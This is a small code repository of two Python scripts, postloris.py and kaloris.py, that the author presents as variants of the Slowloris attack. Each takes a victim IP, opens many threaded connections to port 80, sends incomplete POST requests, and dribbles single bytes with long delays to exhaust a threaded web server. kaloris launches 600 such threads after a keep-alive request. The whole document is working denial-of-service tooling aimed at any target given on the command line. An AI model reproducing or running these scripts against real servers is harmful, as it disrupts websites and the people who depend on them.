├── postloris.py
└── kaloris.py


/postloris.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | """
 3 | Postloris is a permutation of the widely publicized 'Slowloris'
 4 | HTTP attacks for threaded web servers.
 5 | ( http://ha.ckers.org/slowloris )
 6 | 
 7 | Ben
 8 | """
 9 | import sys, socket, time, threading as th, os
10 | 
11 | # Crude Input Validation
12 | if len(sys.argv) != 2: 
13 | 	sys.stderr.write("        Syntax error! Correct usage:\n%s <target IP> e.g. %s 127.0.0.1\n\n" % (sys.argv[0], sys.argv[0]))
14 | 	sys.exit(2)
15 | 
16 | #Definitions
17 | victim = sys.argv[1]
18 | msgstart = "POST /index.php HTTP/1.1\r\nHost: slowfox.com\r\nContent-Length: 2000\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
19 | 
20 | class clith(th.Thread):
21 | 	def run(self):
22 | 		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
23 | 		s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
24 | 		s.connect((victim, 80))
25 | 		s.send(msgstart)
26 | 		for b in range(10):
27 | 			s.send("a")
28 | 			time.sleep(5)
29 | 		s.close()
30 | 		sys.stdout.write("\x08")
31 | 
32 | for x in xrange(10):
33 | 	clith().start()
34 | 	sys.stdout.write(".")
35 | 	sys.stdout.flush()
36 | 


--------------------------------------------------------------------------------
/kaloris.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | # A Slowloris style attack delivered via HTTP Keep-Alives
 3 | #
 4 | # Ben 
 5 | 
 6 | import sys, socket, time, threading as th, os
 7 | 
 8 | # Crude Input Validation
 9 | if len(sys.argv) != 2: 
10 | 	sys.stderr.write("        Syntax error! Correct usage:\n%s <target IP> e.g. %s 127.0.0.1\n\n" % (sys.argv[0], sys.argv[0]))
11 | 	sys.exit(2)
12 | 
13 | 
14 | # Defines:
15 | contlen = 10
16 | victim = sys.argv[1]
17 | kaopen = "GET / HTTP/1.1\r\nHost: kaloris.omnom\r\nUser-Agent: bonk!\r\nConnection: Keep-Alive\r\n\r\n"
18 | msgstart = "POST /index.php HTTP/1.1\r\nHost: slowfox.com\r\nContent-Length: 900\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
19 | 
20 | class clith(th.Thread):
21 | 	#Open connection and send initial request headers.
22 | 	def run(self):
23 | 		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
24 | 		s.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, 1)
25 | 		s.connect((victim, 80))
26 | 		s.send(kaopen)
27 | 		time.sleep(.5) # This is necessary to prevent Nagle-like behavior. Surprisingly NODELAY did _not_ do the trick.
28 | 		s.send(msgstart)
29 | 		for b in range(10):
30 | 			# Send the data, byte at a time, to keep the connection threaded.
31 | 			s.send("a")
32 | 			time.sleep(60)
33 | 		s.close()
34 | 
35 | # Spawn the threads and go insane.
36 | # I'M GONNA SING THE DOOM SONG NOW!
37 | for x in xrange(600):
38 | 	clith().start()
39 | 	print "."+str(x)+"."
40 | 


--------------------------------------------------------------------------------